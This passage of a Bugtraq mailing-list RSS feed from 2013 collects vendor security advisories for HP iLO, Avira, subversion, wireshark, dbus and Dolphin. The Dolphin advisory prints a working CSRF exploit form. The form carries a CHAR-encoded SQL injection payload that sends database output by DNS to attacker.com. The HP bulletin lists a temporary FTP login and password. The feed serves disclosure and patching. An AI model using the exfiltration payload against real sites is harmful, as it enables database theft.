-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>FreeBSD Security Advisories</dc:creator>
    <dc:date>2013-06-18T07:32:24</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51989">
    <title>[security bulletin] HPSBHF02885 rev.2 - HP Integrated Lights-Out iLO3 and iLO4 using Single-Sign-On (SSO), Remote Unauthorized Access</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51989</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Document ID: c03787836
Version: 2

HPSBHF02885 rev.2 - HP Integrated Lights-Out iLO3 and iLO4 using
Single-Sign-On (SSO), Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-06-11
Last Updated: 2013-06-17

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Integrated
Lights-Out iLO3 and iLO4 using Single-Sign-On (SSO). The vulnerability could
be remotely exploited resulting in unauthorized access.

References: CVE-2013-2338 (SSRT101180)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Integrated Lights-Out 3 (iLO3) firmware versions prior to v1.57.
HP Integrated Lights-Out 4 (iLO4) firmware versions prior to v1.22.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2013-2338    (AV:N/AC:M/Au:N/C:C/I:C/A:C)       9.3
===========================================================
             Information on CVSS is documented
            in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following Firmware updates available to resolve the
vulnerability.

The latest firmware and installation instructions are available from the HP
Business Support Center: http://www.hp.com/go/bizsupport

HP Integrated Lights-Out 4 (iLO4) Online ROM Flash Component for Linux and
Windows v1.22 or subsequent.

HP Integrated Lights-Out 3 (iLO3) Online ROM Flash Component for Linux and
Windows v1.57 or subsequent.

Note: Due to an unexpected delay in the iLO3 v1.57 firmware release, please
use the following temporary FTP site for downloading the update...

FTP System: ftp.usa.hp.com (15.192.32.78 or 15.193.0.64)

Login: ilo3_157
Password: G!v3t2me

Note: login and password are CASE-sensitive.

HISTORY
Version:1 (rev.1) - 11 June 2013 Initial release
Version:2 (rev.2) - 17 June 2013 Added temporary FTP access for the v1.57
update

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-alert&amp;lt; at &amp;gt;hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert&amp;lt; at &amp;gt;hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.


&lt;/pre&gt;</description>
    <dc:creator>security-alert&lt; at &gt;hp.com</dc:creator>
    <dc:date>2013-06-17T21:02:07</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51983">
    <title>Re: WordPress 3.5.1, Denial of Service</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51983</link>
    <description>&lt;pre&gt;
Please use CVE-2013-2173 for this issue.

---
Henri Salo
&lt;/pre&gt;</description>
    <dc:creator>Henri Salo</dc:creator>
    <dc:date>2013-06-13T06:34:18</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51982">
    <title>LSE Leading Security Experts GmbH - LSE-2013-06-13 - Avira AntiVir Engine</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51982</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


=== LSE Leading Security Experts GmbH - Security Advisory 2013-06-13 ===

Avira AntiVir Engine -- Denial of Service / Filtering Evasion
- -------------------------------------------------------------

Affected Versions
=================
Avira AntiVir Engine &amp;lt; 8.2.12.58

Affected products using the AntiVir engine are:

Avira Server Security
Avira AntiVir MailGate
Avira AntiVir MailGate Suite
Avira Exchange Security
Avira AntiVir WebGate
Avira AntiVir WebGate Suite
Avira AntiVir SharePoint
Avira Professional Security
Avira AntiVir Personal
Avira Savapi

Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: high
Vendor: Avira Operations GmbH &amp;amp; Co. KG
Credits: LSE Leading Security Experts GmbH employees Markus Vervier
and Eric Sesterhenn
Advisory URL: http://www.lsexperts.de/advisories/lse-2013-06-13.txt
Advisory Status: Public
CVE-Number: CVE-2013-4602

Problem Description
===================
While conducting a penetration test on a customer system LSE Leading
Security Experts GmbH discovered a Denial of Service vulnerability and
possible memory corruption in the Avira AntiVir Engine.
By scanning specially crafted PDF documents, a bug can be triggered
which causes an endless loop in the scanning engine.

Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to install the latest
updates via the update functionality. The fix for this issue was
released by Avira Operations GmbH on 2013-06-11.

Problem Impact
==============
When scanning specially crafted PDF documents an endless loop is
caused in the Avira AntiVir scanning engine. This allows an attacker
to stall the antivirus engine and prevent malicious files from being
detected.
Additionally an attacker may be able to cause the antivirus engine to
consume all available resources on the system. In case of enterprise
setups like for example mailgateways an effective Denial of Service
attack can be launched on the whole system.
LSE Leading Security Experts GmbH will provide additional details
including a proof of concept on a later date to protect affected
customers.

History
=======
2013-06-05 Problem discovery during penetration testing
2013-06-06 Original vendor contacted
2013-06-06 Vulnerability confirmed by vendor
2013-06-11 Updated Engine Released
2013-06-13 CVE-2013-4602 assigned
2013-06-13 Coordinated Advisory Release
- -- 
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschäftsführer: Oliver Michel, Sven Walther, Dr. Peter Schill

&lt;/pre&gt;</description>
    <dc:creator>LSE Leading Security Experts GmbH (Security Advisories)</dc:creator>
    <dc:date>2013-06-13T12:57:09</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51981">
    <title>[ MDVSA-2013:173 ] subversion</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51981</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:173
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : subversion
 Date    : June 13, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in subversion:
 
 If a filename which contains a newline character (ASCII 0x0a)
 is committed to a repository using the FSFS format, the resulting
 revision is corrupt. This can lead to disruption for users of the
 repository (CVE-2013-1968).
 
 Subversion's svnserve server process may exit when an incoming TCP
 connection is closed early in the connection process. This can lead
 to disruption for users of the server (CVE-2013-2112).
 
 This advisory provides the latest versions of subversion
 (1.6.23/1.7.10) which are not vulnerable to these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1968
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2112
 http://subversion.apache.org/security/CVE-2013-1968-advisory.txt
 http://subversion.apache.org/security/CVE-2013-2112-advisory.txt
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:

 Mandriva Enterprise Server 5/X86_64:

 Mandriva Business Server 1/X86_64:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  &amp;lt;security*mandriva.com&amp;gt;


&lt;/pre&gt;</description>
    <dc:creator>security&lt; at &gt;mandriva.com</dc:creator>
    <dc:date>2013-06-13T17:58:00</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51980">
    <title>[SECURITY] [DSA 2707-1] dbus security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51980</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2707-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                         Yves-Alexis Perez
June 13, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : dbus
Vulnerability  : denial of service
Problem type   : local 
Debian-specific: no
CVE ID         : CVE-2013-2168

Alexandru Cornea discovered a vulnerability in libdbus caused by an
implementation bug in _dbus_printf_string_upper_bound(). This
vulnerability can be exploited by a local user to crash system services
that use libdbus, causing denial of service. Depending on the dbus
services running, it could lead to complete system crash.

The oldstable distribution (squeeze) is not affected by this problem.

For the stable distribution (wheezy), this problem has been fixed in
version 1.6.8-1+deb7u1.

For the testing distribution (jessie), this problem has been fixed in
version 1.6.12-1.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.12-1.

We recommend that you upgrade your dbus packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org


&lt;/pre&gt;</description>
    <dc:creator>Yves-Alexis Perez</dc:creator>
    <dc:date>2013-06-13T12:49:21</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51977">
    <title>[ MDVSA-2013:172 ] wireshark</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51977</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:172
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : wireshark
 Date    : June 12, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in wireshark:
 
 * The ASN.1 BER dissector could crash (CVE-2013-3557).
 * The CAPWAP dissector could crash (CVE-2013-4074).
 * The HTTP dissector could overrun the stack (CVE-2013-4081).
 * The DCP ETSI dissector could crash (CVE-2013-4083).
 
 This advisory provides the latest version of Wireshark (1.6.16)
 which is not vulnerable to these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3557
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4074
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4081
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4083
 http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html
 http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:

 Mandriva Enterprise Server 5/X86_64:

 Mandriva Business Server 1/X86_64:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  &amp;lt;security*mandriva.com&amp;gt;


&lt;/pre&gt;</description>
    <dc:creator>security&lt; at &gt;mandriva.com</dc:creator>
    <dc:date>2013-06-12T12:03:01</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51976">
    <title>SQL Injection in Dolphin</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51976</link>
    <description>&lt;pre&gt;Advisory ID: HTB23157
Product: Dolphin
Vendor: BoonEx
Vulnerable Version(s): 7.1.2 and probably prior
Tested Version: 7.1.2
Vendor Notification: May 22, 2013 
Vendor Patch: May 29, 2013 
Public Disclosure: June 12, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-3638
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Dolphin, which can be exploited to manipulate SQL requests passed to the vulnerable application and obtain sensitive data from the database.


1) SQL Injection in Dolphin: CVE-2013-3638

The vulnerability exists due to insufficient validation of "pathes[]" HTTP POST parameter passed to "/administration/categories.php" PHP script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in application administrator to visit a web page with CSRF exploit.

The basic CSRF exploit code below is based on the DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The exploit will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):


&amp;lt;form action="http://[host]/administration/categories.php" method="post" name="main"&amp;gt;
&amp;lt;input type="hidden" name="pathes[]"   value="1%%(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- %%1"&amp;gt;
&amp;lt;input type="hidden" name="action_disable"   value="1"&amp;gt;
&amp;lt;input type="submit" id="btn"&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;script&amp;gt;
document.main.submit();
&amp;lt;/script&amp;gt;


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Dolphin 7.1.3

More Information:
http://www.boonex.com/trac/dolphin/changeset/17659
http://www.boonex.com/trac/dolphin/milestone/Dolphin%207.1.3
http://www.boonex.com/n/stability-security-spam-prevention-and-more


-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23157 - https://www.htbridge.com/advisory/HTB23157 - SQL Injection in Dolphin.
[2] Dolphin - http://www.boonex.com - The world's most advanced software platform for building vibrant community websites.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


&lt;/pre&gt;</description>
    <dc:creator>advisory&lt; at &gt;htbridge.com</dc:creator>
    <dc:date>2013-06-12T09:40:21</dc:date>
  </item>
  <textinput rdf:about="http://search.gmane.org/?group=$group=gmane.comp.security.bugtraq">
    <title>Search Engine</title>
    <description>Search the mailing list at Gmane</description>
    <name>query</name>
    <link>http://search.gmane.org/?group=$group=gmane.comp.security.bugtraq</link>
  </textinput>
</rdf:RDF>
